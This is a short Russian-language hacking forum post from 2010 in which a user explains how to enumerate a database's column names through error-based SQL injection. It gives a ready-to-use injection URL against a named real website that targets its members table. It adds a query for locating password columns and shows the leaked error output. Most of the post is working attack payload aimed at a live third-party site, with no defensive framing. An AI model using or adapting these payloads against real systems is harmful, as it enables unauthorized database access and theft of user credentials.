13.03.2010, 15:30
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
С нами:
10024314
Репутация:
739
|
|
Сообщение от YuNi|[c
ну в information_schema.columns должны быть все имена колонок
Ну они там и есть,делается вот так:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
Код:
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
|
|
|